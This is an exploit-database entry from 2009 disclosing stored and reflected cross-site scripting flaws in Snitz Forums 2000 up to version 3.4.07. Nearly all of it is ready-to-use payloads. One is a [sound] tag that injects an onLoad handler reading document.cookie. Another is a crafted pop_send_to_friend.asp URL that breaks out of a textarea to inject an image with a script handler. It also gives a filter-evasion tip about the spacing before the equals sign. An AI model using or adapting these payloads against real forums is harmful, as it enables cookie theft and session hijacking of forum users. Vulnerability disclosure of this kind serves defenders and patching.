Snitz Forums 2000 <= 3.4.07 xss

2009-10-15T00:00:00
ID 1337DAY-ID-9908
Type zdt
Reporter Andrea Fabizi
Modified 2009-10-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================
Snitz Forums 2000 <= 3.4.07 xss
===============================

**************************************************************
Application: Snitz Forums 2000
Version affected:  3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Vuln: Multiple Cross-Site Scripting
**************************************************************
 
###### PERMANENT XSS
If [sound] tag is allowed:
 
[sound]http://url_to_valid_mp3_or_m3u_file.m3u"
onLoad="alert(document.cookie)[/sound]
######
 
###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
src="http://www.google.it/intl/it_it/images/logo.gif" onLoad
="alert(document.cookie)">
 
Note the space: onLoad<space>="alert(document.cookie)"
######



#  0day.today [2018-04-14]  #